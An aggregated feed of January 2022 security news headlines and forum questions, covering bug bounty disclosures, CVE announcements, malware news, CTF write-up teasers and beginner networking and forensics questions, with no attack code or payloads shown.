    Snikket Server – 2022-01-13 security release (CVE-2022-0217)
    Article URL: https://snikket.org/blog/snikket-jan-2021-security-release/ Comments URL: https://news.ycombinator.com/item?id=29931694 Points: 1 # Comments: 0  ( 2 min )

  • Open

    Bug Report : [ No Valid SPF Records ]
    Ruby disclosed a bug submitted by sohaib619: https://hackerone.com/reports/1301696
    AEM forms XXE Vulnerability
    Adobe disclosed a bug submitted by ismailmuh: https://hackerone.com/reports/1321070
    Disclosure of github access token in config file via nignx off-by-slash
    Adobe disclosed a bug submitted by letm3through: https://hackerone.com/reports/1386547
    Reflected xss and open redirect on larksuite.com using /?back_uri= parameter.
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/955606 - Bounty: $500
    [IDOR] Modify other team's reminders via reminderId parameter
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/946323 - Bounty: $500
  • Open

    Propagating phishing via Slack webhooks
    submitted by /u/amirshk [link] [comments]
    Forensics Analysis of the NSO Group’s Pegasus Spyware
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
    BreakingFormation: Orca Security Research Team Discovers AWS CloudFormation Vulnerability
    submitted by /u/eberkut [link] [comments]  ( 1 min )
    SSH Bastion Host Best Practices
    submitted by /u/old-gregg [link] [comments]
    HiddenWall is a tool to generate a custom Hidden firewall to run in Linux kernel.
    submitted by /u/CoolerVoid [link] [comments]  ( 2 min )
    This script analyses the Nmap XML scanning results, parses each CPE context and correlates to search CVE on NIST. You can use that to find public vulnerabilities in services.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    Security bulletin for recent AWS Glue vulnerability
    Article URL: https://aws.amazon.com/security/security-bulletins/AWS-2022-002/ Comments URL: https://news.ycombinator.com/item?id=29927538 Points: 2 # Comments: 0  ( 2 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Severe Vulnerability Found in Another NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481671995167506433 Comments URL: https://news.ycombinator.com/item?id=29923463 Points: 4 # Comments: 0  ( 1 min )
    AWS Superglue Vulnerability
    Article URL: https://orca.security/resources/blog/aws-glue-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29923004 Points: 29 # Comments: 3  ( 5 min )
    BreakingFormation: AWS CloudFormation Vulnerability
    Article URL: https://orca.security/resources/blog/aws-cloudformation-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=29922522 Points: 79 # Comments: 22  ( 5 min )
    Attacking RDP from Inside: Remote Desktop Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/attacking-rdp-from-inside Comments URL: https://news.ycombinator.com/item?id=29920955 Points: 2 # Comments: 0  ( 11 min )
    Found a Vulnerability In NPM Package
    Article URL: https://twitter.com/DevNackOfficial/status/1481537073068843013 Comments URL: https://news.ycombinator.com/item?id=29918100 Points: 1 # Comments: 2  ( 1 min )
    Exploring the Log4Shell Vulnerability through files
    Article URL: https://blog.borneo.io/exploring-the-log4shell-vulnerability-dd7000eed4a4?gi=5d43b39b3d22 Comments URL: https://news.ycombinator.com/item?id=29915825 Points: 2 # Comments: 0  ( 7 min )
  • Open

    SPF Record Question
    If a root domain like sendgrid.net is added to an SPF record, does that mean any free user or paid user of sendgrid can spoof an email from your domain and SPF checks would pass? submitted by /u/mtx4gk [link] [comments]  ( 1 min )
    How do I check if I visited a site with malware?
    I was browsing through reddit and clicked on a link in r/dermotology that send me to a weird site that played a weird video and there was no question or content besides that. I used virus total to check the website and it looks like they're using it for advertising revenue clicks, but my paranoia is kicking in. Site was visited on an android with calyx is using duckduckgo version 5.106.0 So the question is- any ideas if I have to nuke this phone? For the curious the website is below. All the spaces are slashes minus the dot com part. vebotto com 2022 01 13 cystic-pimple submitted by /u/instantpotbeans [link] [comments]  ( 2 min )
    Google Drive Security - VPN and MFA
    Hi there, I'm posting here to get some expert advice, we are a small startup dealing with very sensitive customer data. Problems we are having - How do we best protect customer data within Google Drive? Customers often share data to us via Google Drive. In security questionnaire, we often get this question - is VPN required for employees to access customer data? We can of course turn on VPN requirement for this, but it also adds friction to use Google Drive on a daily basis. Google Drive has MFA turned on, but it does not seem to enforce zero trust policy, and we are never prompted to enter passwords regularly. Any suggestions here? submitted by /u/Commercial_Rip7550 [link] [comments]  ( 1 min )
    Reverse engineering question
    Hi r/AskNetsec I've got a pretty unusual question in regards to RE that might sound weird, or it's just not making sense to me (and baring in mind, I am a beginner to reversing malware). I am currently writing a report and within the report format, "reverse engineering" and "disassembly" are two different sections. This doesn't really make much sense to me. Disassembly is already a form of reverse engineering. Nevertheless, the information that you could insert into an RE section would be Wireshark analysis, viewing the file in PEStudio for instance, but those are already in sections relating to static & dynamic analysis. So what would be inserted into a reverse engineering section regarding malware? I can literally only think of unpacking the malware as everything else that would constitute reverse engineering is in other sections. Honestly, I have no idea. When I asked for some help in regards to knowing the distinction between the two, I was told that "disassembly" is a noun, and "reverse engineering" is a verb. Which is probably right, but it didn't help at all. An example of breaking encryption was proposed in relation to RE. Again, it didn't shed much light for me. I just want to be familiar with the distinction here. Thanks. submitted by /u/pat0000 [link] [comments]  ( 2 min )
    Need an antivirus solution for webapp in MS Azure that is compliant with EU data protection law
    we run an webapp in azure. users can upload .zip, .pdf, .png, .jpeg and .csv files. therefore an antivurs scanner is needed for those files. at another project we use clamav in an azure container instance. the problem is containers don´t scale very well. we would prefere a SAAS solution in azure but there are few options. we need a solution that is scalable and doesn´t send the files to servers outside the EU due to the local data protection law. at best the software is made by an EU company. we thought about "abusing" an azure storage by uploading the files there and waiting if microsoft defender for cloud reacts. anyone any experience with this? how fast would such a solution be? any recommendations? TLDR: need antivirus software for file upload webapp in azure SAAS prefered scalability compliant with EU data protection law Thank you for your help! submitted by /u/devsecops22 [link] [comments]  ( 2 min )
    Brave Browser --Flags Questions
    Hi there r/AskNetsec I just wanted to ask a quick question if these specific flags out of the bunch that Brave runs is of any concern? The names sparked my interest and a bit of panic when I first noticed after using it for about a month. IdleDetection --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed ​ Whole flag trace is this if needed: [redacted]\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe" --type=renderer --disable-client-side-phishing-detection --display-capture-permissions-policy-allowed --origin-trial-public-key=[redacted]=,[redacted]= --brave_session_token=[redacted] --field-trial-handle=[redacted],[redacted],[redacted] --enable-features=AutoupgradeMixedContent,LegacyTLSEnforced,PasswordImport,PrefetchPrivacyChanges,Red…  ( 1 min )
    Is there a solution to encrypt an OS at the RAM/CPU level?
    Thinking about cloud threat models, is there a solution that exists that can encrypt an OS at the RAM/CPU level to further restrict hosting providers ability to reach, view and use a machine outside of the usual disk encryption. While I am sure it’s a a long shot but there does exist a possibility where can access the machine from a local terminal via their hosting infrastructure or dump the RAM on the hypervisor. Is there any way or value in preventing that or is it just a risk that has to be accepted when using a cloud provider? submitted by /u/concon2015 [link] [comments]  ( 1 min )
  • Open

    AVG Tune Up
    Anybody know what service AVG Tuneup uses to perform a cleanup when the program is executed? submitted by /u/mikefromjerz [link] [comments]  ( 1 min )
    I’ve heard SANS FOR508 and the GCFA is challenging. How challenging is it for an entry level candidate who is just starting out?
    Any tips? Experiences? I’ve had hands on forensics experience and have FOR500 knowledge. Is FOR508 doable? submitted by /u/curiousgal1996 [link] [comments]  ( 3 min )
  • Open

    Using GitHub to manage your first CVE
    Article URL: https://authzed.com/blog/using-github-to-manage-your-first-cve/ Comments URL: https://news.ycombinator.com/item?id=29925154 Points: 4 # Comments: 0  ( 9 min )
    CVE-2021-31166: MS HTTP Protocol Stack Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166 Comments URL: https://news.ycombinator.com/item?id=29924445 Points: 16 # Comments: 0
    Prosody 0.11.12 released (CVE-2022-0217 fix)
    Article URL: https://blog.prosody.im/prosody-0.11.12-released/ Comments URL: https://news.ycombinator.com/item?id=29921870 Points: 3 # Comments: 0  ( 1 min )
    A Quick CVE-2022-21907 FAQ (work in progress)
    Article URL: https://isc.sans.edu/forums/diary/28234/ Comments URL: https://news.ycombinator.com/item?id=29917559 Points: 2 # Comments: 1  ( 1 min )
  • Open

    Index of Movies, TV series and Documentaries (lots of BBC, how it's made etc..).
    submitted by /u/josephalbright1 [link] [comments]  ( 1 min )
    Sporalis
    https://drive.google.com/drive/folders/1rmL4Yn7mJ78emYQ-PjIhDGYkph_9iEjZ https://drive.google.com/drive/folders/1s3v5WdrPLEvnGLbzM8RGSyI0iorkbU-W https://drive.google.com/drive/folders/1nitHECSorEadPtGwK5F_9-TdAcHHJGZG submitted by /u/Burlack [link] [comments]
    Dont mind me. Just dropping some links to check size before downloading
    https://drive.google.com/drive/folders/1X2L-UtctJulbDEP63NnLSwlEaXgwTe0x https://drive.google.com/drive/folders/1pMRoHMd3H0P0g6lvEWFUR1teiPSy9VqR https://drive.google.com/drive/folders/0B2UZmHpzoVm6eXYyM09PUXF1TDA?resourcekey=0-A5ZN-_lF1S2Eh3xmJSC9kw https://drive.google.com/drive/folders/1nfMA72hL1PHFTWVkzjlSBAmfPyBg89dx https://drive.google.com/drive/folders/17KyX_80h0yBUrc3X-PMa3EnXoE0kFmJJ?sort=13&direction=a submitted by /u/Burlack [link] [comments]  ( 1 min )
    FTP OEM Pc Builder
    I'm trying to list the different ftp from computer builder. I think most of them are already present on this / r. But perhaps bringing them together in a single post is a good idea? (I will add them as I find them / the community finds them) HP FTP : ftp://ftp.hp.com |Url: ftp://ftp.hp.com/||Urls file| |Extension (Top 5)|Files|Size| |.exe|106,034|5.61 TiB| |.ibr|862|5.21 TiB| |.zip|10,739|443.95 GiB| |.fmw|290|384.7 GiB| |.iso|256|322.51 GiB| |Dirs: 83,006 Ext: 1,375|Total: 793,218|Total: 12.98 TiB| |Date (UTC): 2022-01-12 17:29:09|Time: 02:19:06|Speed: 22.87 MB/s (182.9 mbit)| Created by [KoalaBear84's OpenDirectory Indexer v2.2.0.9](https://github.com/KoalaBear84/OpenDirectoryDownloader/) IBM FTP : ftp://ftp.software.ibm.com/ |Url: ftp://ftp.software.ibm.com/||Urls file| |Extension (…  ( 2 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
    Why Bugfix Postmortems Are Good For Web3
    This past year has been eventful for anyone building on the Web3 stack — over the course of the year, DeFi has grown from a nascent… Continue reading on Immunefi »  ( 3 min )
    Launching Collector Portal for a closed beta group
    We are proud to announce our beta platform launch for selected users starting on the 26th of January. Continue reading on Envoy »  ( 2 min )
    FB Lite All Users Active Status Changed
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    C.S.T.I Lead To Account Takeover $$$
    Hello amazing hunter, Today i want to tell you a short story but this story has long memory for me. In this story i found some… Continue reading on System Weakness »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist (PART-1)
    Hey, it’s me again back with another checklist. I saw various articles and tools specifically designed to exploit one vulnerability. It… Continue reading on Medium »  ( 2 min )
    My Perfect Bug Bounty Docker Setup
    I hate installing things on my computer because of the bloated slow mess it becomes overtime. So when I found out about docker I fell in… Continue reading on System Weakness »  ( 3 min )
    PHP Type Juggling
    PHP is the dynamic language that checks variables when the program is executing and provides flexibility to the developers. But this… Continue reading on Medium »  ( 1 min )
  • Open

    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on System Weakness »  ( 3 min )
    XSS Filter Evasion + IDOR
    Hi there. I’m JM Sanchez, a student, and a bug bounty hunter. After months of duplicate reports, I finally found a valid high severity bug. Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-13 Review
    将EXE程序通过Powershell形式实现无文件运行 by ourren QRS 2021 论文录用列表 by ourren 从分析一个赌球APP中入门安卓逆向、开发、协议分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    FreeBuf早报 | 大量美国和加拿大人的财务数据遭曝光;Firefox 出现无法联网问题
    全球动态1. 因解决BUG不力,密码管理工具LastPass或面临2000万欧元罚款因解决问题不力等诸多问题,知名密码管理工具 LastPass 正面临 2000 万欧元的 GDPR 罚款风险。[阅读原文]2.美国一监狱遭勒索软件攻击,监控摄像头与门禁系统被破坏美国新墨西哥州中部的阿尔伯克基(Albuquerque)地区监狱上周遭勒索软件攻击,监控摄像头无法访问、自动门禁系统也受到了影响,导致囚犯  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业远程办公的安全之道
    从安全角度来看,远程办公意味着办公网络的边界被打破,企业该如何重新审视自身的安全策略,降低安全风险?  ( 1 min )
    数百万便携式路由器受KCodes NetUSB 漏洞影响
    涉及厂商包括 Netgear、TP-Link、Tenda、EDiMAX、D-Link 和西部数据。  ( 1 min )
    大量美国和加拿大人的财务数据遭曝光
    Website Planet网络安全员发现一个配置错误的数据库,该数据库暴露了约 82万 条记录,其中约 60万 条是客户信用记录。  ( 1 min )
    跨平台恶意后门 SysJoker 行为分析及解码
    2021 年 12 月,Intezer 发现了一个能够对 Windows、Mac 和 Linux 发起攻击的跨平台后门 SysJoker。  ( 1 min )
    新型恶意软件SysJoker正对Windows、Linux 和macOS 操作系统构成威胁
    SysJoker 新型恶意软件正对Windows、Linux 和 macOS 操作系统构成威胁,可利用跨平台后门来从事间谍活动。  ( 1 min )
    《“十四五”数字经济发展规划》,网络安全再被重点提及
    《规划》的第九章“着力强化数字经济安全体系”系统阐述了网络安全对于数字经济的独特作用及重要性。
    研读网络安全法律法规,提升技术管理者 “法” 商
    了解不同法律法规的等级层次,可以帮助我们更好的理解国家在立法过程中的目的。  ( 1 min )
  • Open

    Burp Suite roadmap for 2022
    With 2022 now underway, it's about time we gave you the latest on where Burp Suite is heading this year. Here we take a look at the powerful new Burp Suite features we'll be working on in 2022 - as we  ( 5 min )
  • Open

    Fuzzing101 with LibAFL – Part IV: Fuzzing LibTIFF
    Article URL: https://epi052.gitlab.io/notes-to-self/blog/2021-11-26-fuzzing-101-with-libafl-part-4/ Comments URL: https://news.ycombinator.com/item?id=29920636 Points: 1 # Comments: 0  ( 26 min )
  • Open

    Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor
    submitted by /u/dmchell [link] [comments]
  • Open

    HONEYPOT DISCUSSIONS PART-1
    Welcome to Honeypot Discussions Part 1. There will be three part of article about honeypots. As here, in the first article we will be… Continue reading on Medium »  ( 5 min )

  • Open

    Miscellaneous Gaming Stuff.
    https://www.thegameisafootarcade.com/wp-content/uploads/ submitted by /u/EmuAnon34 [link] [comments]
    Are there such things as open navidrome / airsonic music servers to listen to?
    Rather than open directories of music, are there open servers that can be used with navidrome / airsonic clients to listen to the music? Are there strings one can use to maybe find them? The search engines aren't finding anything submitted by /u/papabear_12 [link] [comments]  ( 1 min )
  • Open

    Ransomware Damage Claims Driving Insurance Hikes
    The costs of cyber insurance policies are rising exponentially while underwriters are tightening the rules around who qualifies for cyber insurance, and at the same time, insurer capacity is constricting dramatically. The numbers are all over the place, but the latest statistics from the Council of Insurance Agents and Brokers reported a 25.5% increase in […] The post Ransomware Damage Claims Driving Insurance Hikes appeared first on Security Weekly.  ( 3 min )
  • Open

    Defeating EDRs with Office Products
    submitted by /u/dmchell [link] [comments]
  • Open

    Exploiting URL Parsing Confusion Vulnerabilities
    submitted by /u/ScottContini [link] [comments]
    Exploit Kits vs. Google Chrome
    submitted by /u/stashing_the_smack [link] [comments]
    Malicious modifications to open source projects affecting thousands
    submitted by /u/MiguelHzBz [link] [comments]  ( 1 min )
    Pre-Auth RCE in Moodle Part II - Session Hijack in Moodle's Shibboleth
    submitted by /u/albinowax [link] [comments]
    ThePhish is an open-source tool that automates the entire phishing email analysis process starting from the extraction of the observables from the header and the body of an email to the elaboration of a verdict which is final in most cases. It is based on TheHive, Cortex and MISP.
    submitted by /u/emalderson [link] [comments]  ( 1 min )
    Ransomware Actor May Have Leaked Their Previous Victims
    submitted by /u/Acrobatic-Pen-9949 [link] [comments]  ( 1 min )
    Researchers release final version of academic study testing 25 EDR and EPP vendors against attacks vectors via CPL, HTA, DLL and EXE
    submitted by /u/woja111 [link] [comments]  ( 1 min )
    [CFP] Call for Papers for Hardwear.io Security Conference USA 2022 is OPEN!
    submitted by /u/hardweario [link] [comments]
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    AFL TUTORIALS FOR BEGINNERS 0X00
    yeni başlayanlar için, afl ile derleme, lib/obje kullanımı,afl/afl++ ile fuzzing nasıl yapılır Continue reading on Medium »  ( 2 min )
  • Open

    Lessons learned from my 10 year open source project
    For the past ten years, I’ve been building a popular open source project. Here are the lessons I’ve learned along the way. Continue reading on Medium »  ( 11 min )
    Bundesservice Telekommunikation — wie ich versehentlich eine Tarnbehörde in der Bundesverwaltung…
    Vor einigen Tagen tat ich etwas, dass ist so ungewöhnlich, das es scheinbar noch fast niemand vor mir gemacht hat: Ich habe mir die Liste… Continue reading on Medium »  ( 6 min )
    OSINT PAKISTAN POLITICIANS
    OSINT CASE STUDY 2 Continue reading on Medium »  ( 3 min )
    It’s a Match! Dating Apps and SOCMINT
    Just like any other social media platform, dating sites are platforms which can be used in online investigations. Considering the current… Continue reading on Medium »  ( 4 min )
  • Open

    Creative / Effective ways to run a security awareness program?
    it's that time of the year again: we are looking to renew our contract with our security awareness vendor. Basically, they provide a portal where people need to go to watch video's of how to prevent the regular security stuff (identify tailgating, spot phishing mails, etc). Some of these video's don't even make sense (e.g. we are for 99% working from home. Tailgating is not a real issue here). Part of this is a "must do" (due to compliance/certification requirements). However, there must surely be a more fun/creative way of doing this? What are some nice/creative ways you have setup security awareness within your organization? Side-note: yes, I know this should be risk based. Yes, I know I should talk to other departments to identify there needs. ;) Just looking for some experiences and idea's. submitted by /u/Flagcapturer [link] [comments]  ( 1 min )
    What is your home setup like and what tech gadgets do you have in your room?
    Hi I work in the InfoSec industry and having worked from home for the last year or so, I want to now start doing up my room and make it very techy At the moment, I do not have anything too exciting or amazing but I am interested to know what your home setups are like Thanks submitted by /u/dasozis [link] [comments]  ( 2 min )
    I get to help design a Cybersecurity room
    As the title says I get to help design a cyber security room for a community college. I want to ask the Netsec community. What would you like to see if you were young and were curious about this world? Tools you wish you had? Something that would of made you excited when you walked past to get into cyber security? All recommendations welcome, thank you! submitted by /u/benxfactor [link] [comments]  ( 3 min )
    Any resources/guides on pen-testing a network not facing the internet?
    Anyone have any resources for pen-testing a network that's supposed to be air gapped? I'm working with some colleagues to pen-test our professors lab as part of our assignment--mainly putting together a report on how we would approach the system if we had hands on access as both an admin and as a non privileged user. The lab itself is pretty simple--its not to be supposed running any web apps or even to be touching the internet. Most pentest guides are great at showing you how to approach scanning the network for misconfigurations and vulnerabilities and then moving over to web applications but I'm wondering if were limited to just enumerating the system and hoping for the best? Mainly looking for resources I can use as references to back any ideas on whats doable. Thanks. submitted by /u/CyberspaceAggressor [link] [comments]  ( 1 min )
    Another subnetting question!
    I'm given the following network address - 209.165.201.0 /24. If I'm splitting this network into two, LAN1 will have 29 hosts and LAN2 with 17 hosts. What I did to subnet this network was incorrect but I don't know the correct answer. I thought LAN1 would have an IP of 209.165.201.0 /27 and LAN 2 would be 209.165.201.33 /27, but from what I understand now is that these subnets cannot share the same CIDR. How would you go about doing this? submitted by /u/crumbjuice [link] [comments]  ( 1 min )
    Potential Risk from Using Bluetooth Headset on a company laptop?
    My company provides work laptops and headsets. However they don't have option for wireless headsets, only wired ones. They also advise against connecting any non company authorised peripherals to the laptop. I am wondering though, what would be realistic risks from connecting a Bluetooth headset to a laptop? submitted by /u/rw1337 [link] [comments]  ( 3 min )
    Internship Questions
    About a month after getting my CCNA training, I have my first interview for an internship in well-known MNC bank in networking field.. & I'm terribly nervous Guys, can you help me with some common questions asked in Bank Networking Interview.. submitted by /u/Aggressive-Dot-7339 [link] [comments]  ( 1 min )
    Best Identity Theft services for Companies
    In your experience what are the best Identity Theft services for Companies/Brands (not for indivisuals)? I an talking of services like: Identity Guard LifeLock IdentityForce Watchdog Thanks for the answers. submitted by /u/NerdSupremacist [link] [comments]  ( 2 min )
    Scanning for Network Listening Device - What is Blackice?
    Hey all, first of all, thanks for any help anyone can provide. I have a limited background in network security understanding from my undergrad in computer science, but have not dipped my toes in seriously in a while, so kinda stumbling through trying to figure this out. A friend asked me to check their network for any rogue listening devices and after a quick scan with Nmap, I came across this device on 192.168.0.1 described as "blackice-icecap". A quick google search makes it sound like this might actual be some kind of device setup to monitor network traffic. Is this something that is worth digging deeper into or am I misunderstanding this? What other avenues for rogue network monitoring should I be looking into? My first thought is that this is all probably a bit over my head, but I thought I'd at least give it a quick peak to see if I can find anything obvious to help my friend out. Thanks again for any feedback or advice. For reference, here is the relevant part of the Nmap result: Nmap scan report for 192.168.0.1 Host is up (0.033s latency). Not shown: 995 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 443/tcp open https 5000/tcp open upnp 8081/tcp filtered blackice-icecap 8082/tcp filtered blackice-alerts ​ submitted by /u/wwants [link] [comments]  ( 1 min )
    Using mobile hotspot on my laptop. Where do I turn on VPN - phone or laptop?
    Hi all Simple question but very hard to find the answer. When I dont have access to good wifi, Im going to be using mobile hotspot to access the internet on my laptop. Question is, where do i turn on my vpn - on my laptop? Or on my phone? Or just to be safe, on both? submitted by /u/AliveandDrive [link] [comments]  ( 3 min )
    Password Cracking LDS
    Has anyone ever done a password audit against an Active Directory LDS server (not regular AD server)? If so any directions on how to extract the hashes using standard tools like ImPacket or DSInternals? We have procedure to crack our AD passwords using these tools but LDS seems to be a slightly different beast. submitted by /u/clayjk [link] [comments]  ( 1 min )
    Best way to remove card from multiple services?
    I would like to unlink my card details on various services. It would be kind of a lot of work to login to each service and delete that info. Is there another way? Would just getting a new card be a good option? submitted by /u/extremexample [link] [comments]  ( 2 min )
    Can the operators of SS7s pull SMSs from carriers in the US at will?
    Provocative title, I know. "At will" is subjective. It was claimed in a post yesterday and today that this is something that SS7 operators can do (which is true). I talked to a security researcher (Lucky 225 on Twitter) who told me that the US is more locked down than other countries and phones 2014+ are using LTE implying that maybe most phones in the US aren't vulnerable to this. Of course, he's not a god and not omnipotent as none of us are. There are things that he doesn't know (as is the case for us all). Does anyone have more information on this that could clarify the extent of the vulnerability in terms of location, G (2G, 3G, etc) and limitations so we can know what we might be vulnerable to? Obviously, getting access to an SS7 is WAY harder than a smartphone, sim card and someone's personal info so maybe this isn't the biggest threat, but still... submitted by /u/iExtrapolate314 [link] [comments]  ( 4 min )
  • Open

    Cybrary
    Hello, I’m currently pursuing my BS in Computer Forensics and Digital Investigation. I can across Cybrary and was wondering if that can help me practice more on the subject? I still feel very lost when taking college course, I want to get more practice in me just want to know if Cybrary is worth the annual membership. If any one has some tips on what courses to take there or other sites I would appreciate it. Thank you in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
    Investigating Message Read Status in Gmail & Google Workspace
    submitted by /u/No_Reflection_3360 [link] [comments]  ( 1 min )
    Interview questions
    So I read the FAQ and went through the SANs link which is posted to prepare for interviews in forensics. I am a recent graduate with a DF degree, and I had my first interview the other day but I am wondering what I could expect for the technical portion of the interview. Are there certain artifacts or definitions I should make sure I’m familiar with that can help? or any common scenario questions that get asked? I apologize if this isn’t the right place to ask this. submitted by /u/investtam [link] [comments]  ( 2 min )
  • Open

    Playing with Kerberos tickets (Host service)
    I’m going to share the results of some experimentation with Kerberos tickets. I’m sorry if this doesn’t add any new value or someone else… Continue reading on System Weakness »  ( 8 min )
  • Open

    Where can I learn windows binary exploitation from the basics?
    submitted by /u/wlo1337 [link] [comments]  ( 1 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    EscapeRoom — PCAP Analysis with Wireshark
    This article provides my approach for solving the EscapeRoom CTF created by The Honeynet Project on the CyberDefenders website, a blue…  ( 8 min )
    Windows application exploitation series PART 1 — Leaky Handles
    What are handles? As per MSDN, Objects are data structures that represent a system resource, this can be a file, process, thread, etc. However, we cannot interact with them directly, to access the…  ( 3 min )
    Day 9 CN- Network Security Devices #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
    CyberDefenders | L’espion
    The OSINT write-ups  ( 4 min )
    [Day 2] Web Exploitation Elf HR Problems | Advent of Cyber 3 (2021)
    The second day, we will be learning about Authentication Bypass.  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control  ( 3 min )
    Secure Development Principles
    When developing new applications, a particularly web based or mobile applications, software development teams often find themselves fixing…  ( 7 min )
  • Open

    SecWiki News 2022-01-12 Review
    Gartner 2021 漏洞评估产品市场指南 by ourren 网安新兴赛道及厂商速查· Cyber Security Billboard by ourren 网络空间测绘溯源技术剖析 by ourren 网络空间威胁狩猎的研究综述 by ourren 长安"战疫"-WriteUp by ourren APT组织情报研究年鉴 2021 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Preventing Broken Access Control: The No.1 OWASP Vulnerability in 2021
    Article URL: https://www.synack.com/blog/preventing-broken-access-control-the-no-1-vulnerability-in-the-owasp-top-10-2021/ Comments URL: https://news.ycombinator.com/item?id=29908197 Points: 3 # Comments: 0  ( 6 min )
  • Open

    FreeBuf早报 | 欧盟将启动供应链安全大规模演练;特斯拉汽车软件被曝安全缺陷
    一名安全研究人员表示,部分特斯拉汽车软件存在“严重”缺陷,该缺陷能够远程解锁车辆门窗、在无钥匙状态下启动车辆并禁用安全系统。  ( 1 min )
    等保2.0测评安全计算环境GaussdDB过程指南(华为高斯数据库)
    一次华为私有云的高斯数据库测评指南  ( 1 min )
    中小企业容易成为网络攻击的目标
    51%的中小企业经历过网络安全漏洞,由此带来的网络犯罪成为了亟待解决的问题。
    长城汽车诚聘多名安全人才
    长城汽车是成立于1984年的中国汽车品牌,诚聘多位安全人才。  ( 1 min )
    密码技术在个人信息合规中的应用与落地
    个人信息合规落地,尤其是个人信息的安全保障义务,不仅仅是法律问题,更是信息安全技术问题。  ( 1 min )
    RedLine 信息窃取器的新变种!伪装成Omicron 病例计数器传播
    RedLine 的目标是存储在浏览器上的用户账户凭证等信息。  ( 1 min )
    斗象PRS-NTA通过华为鲲鹏 920兼容性认证
    坚持信创,斗象科技不断深化国产化生态合作。
    安卓版Firefox Focus浏览器增强了隐私保护,阻止跨站点跟踪
    安卓版火狐Focus浏览器进一步强化了隐私保护功能,可防止cookie 被用于广告和分析用户行为,以此来保护用户在浏览内容时免受跨站点跟踪。  ( 1 min )
    常见的加密方式实例
    通常在我们测逻辑漏洞或写爬虫的时候,如果遇到前端加密,我们可以选择将加密算法拖出来,对自己调试的参数进行加密。  ( 10 min )
    微软:powerdir 漏洞允许访问macOS用户数据
    微软发布消息称,威胁行为者可以利用 macOS 漏洞绕过透明,同意和控制(TCC)框架来访问用户受保护的数据。  ( 1 min )
    工业网络靶场漫谈(七)|发展趋势展望
    数字化转型正在加速推动OT与IT的融合发展,与此同时OT与IT融合的网络安全风险也同步演进发展。  ( 1 min )
    黑客用漏洞清除债务 这种漏洞如何“早知道”
    利用漏洞清除债务,盗取数据,一键获取XX游戏的所有账户登陆权限,这些看似爽文里的“骚操作”其实早就在现实中上演。  ( 1 min )
  • Open

    How to attack Offensive Security Web Expert (OSWE)
    In this article, we will discuss about one of the toughest exams from Offensive Security, the web expert one (OSWE). Continue reading on Medium »
    Bug Bounty Methodology — Horizontal Enumeration
    While performing a security assessment our main goal is to map out all the domains owned by a single entity. This means knowing all the… Continue reading on Medium »  ( 3 min )
    Xiaomi Arbitrary JavaScript Vulnerability
    I’m glad you’re here. Please have fun reading (nmochea). Continue reading on Medium »  ( 1 min )
    learning prerequisites for hacking and bug bounty?
    hey computer geeks. i am writing this cause i have faced very problems in getting started in “cyber security” cause of i don’t know where… Continue reading on Medium »  ( 3 min )
    Attacking ARP: Learn Networking By Breaking Stuff For Bug Bounty Hunters, Penetration Testers, and…
    An introduction to the fundamentals of one of the most important protocols on the internet and the methodology to exploit it for fun and… Continue reading on Dev Genius »  ( 5 min )
    Subdomain Enumeration — The Right way (Prerequisites)
    So, I have seen various articles about subdomain enumeration and decided to make one in detail without confusing everyone with various… Continue reading on Medium »  ( 3 min )
  • Open

    Friend Request Flow Exposes User Data
    Zenly disclosed a bug submitted by yetanotherhacker: https://hackerone.com/reports/1245741 - Bounty: $750
    Account Takeover via SMS Authentication Flow
